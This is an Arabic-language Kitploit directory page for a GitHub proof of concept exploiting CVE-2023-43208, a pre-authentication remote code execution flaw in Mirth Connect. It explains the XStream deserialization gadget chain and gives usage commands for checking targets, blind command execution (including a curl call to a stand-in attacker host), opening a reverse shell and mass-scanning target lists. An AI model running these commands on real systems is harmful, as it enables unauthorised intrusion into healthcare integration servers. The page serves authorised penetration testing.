Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-43208 — CVE-2023-43208: إثبات المفهوم لتنفيذ الأوامر عن بعد قبل المصادقة في Mirth Connect | Kitploit
أدوات/GitHubGitHub/kyakei/cve-2023-43208
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubkyakei/cve-2023-43208

CVE-2023-43208

CVE-2023-43208: إثبات المفهوم لتنفيذ الأوامر عن بعد قبل المصادقة في Mirth Connect

عرض المستودع
311منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-43208 — ثغرة RCE قبل المصادقة في Mirth Connect

تنفيذ كود عن بعد بدون مصادقة في NextGen Healthcare Mirth Connect < 4.4.1 عبر تجاوز إلغاء تسلسل XStream.

CVSS 9.8 (حرجة) — تجاوز التصحيح لـ CVE-2023-37679

نظرة عامة

يستخدم Mirth Connect مكتبة Java XStream لإلغاء تسلسل حمولات XML على نقطة النهاية /api/users بدون مصادقة. قدم الإصلاح الأصلي (CVE-2023-37679) قائمة حظر للفئات الخطيرة، ولكن تم تجاوز ذلك باستخدام EventBindingInvocationHandler من Apache Commons Lang3 بالإضافة إلى سلسلة InvokerTransformer من Commons Collections4.

تم الإصلاح في Mirth Connect 4.4.1 بالتحول من قائمة الحظر إلى قائمة السماح.

المتطلبات

root@kitploit:~
pip install requests

Python 3.10+ (يستخدم جمل match).

الاستخدام

التحقق مما إذا كان الهدف عرضة للخطر

root@kitploit:~
python3 exploit.py check -t https://target:8443

تنفيذ أمر (RCE أعمى — لا مخرجات)

root@kitploit:~
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"

الحصول على شل عكسي

root@kitploit:~
# Terminal 1 (أو دع السكريبت يدير المستمع):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# لتجربة شل أفضل، استخدم rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

فحص أهداف متعددة

root@kitploit:~
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30

سلسلة الهجوم

root@kitploit:~
POST /api/users  (بدون مصادقة)
     │
     ▼
XStream يلغي تسلسل حمولة XML
     │
     ▼
sorted-set يطلق Comparable.compareTo()
     │
     ▼
dynamic-proxy → EventBindingInvocationHandler (يتجاوز قائمة الحظر)
     │
     ▼
ChainedTransformer.transform()
     │
     ▼
ConstantTransformer(Runtime.class)
  → InvokerTransformer("getRuntime")
    → InvokerTransformer("invoke")
      → InvokerTransformer("exec", <command>)
           │
           ▼
      تنفيذ أمر نظام التشغيل كمستخدم خدمة Mirth Connect

إخلاء مسؤولية

هذه الأداة مقدمة لأغراض اختبار الأمن المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على التصريح المناسب قبل الاختبار.

المراجع

  • NVD — CVE-2023-43208
  • Horizon3.ai — شرح
  • كتالوج CISA KEV
تنزيل الأداة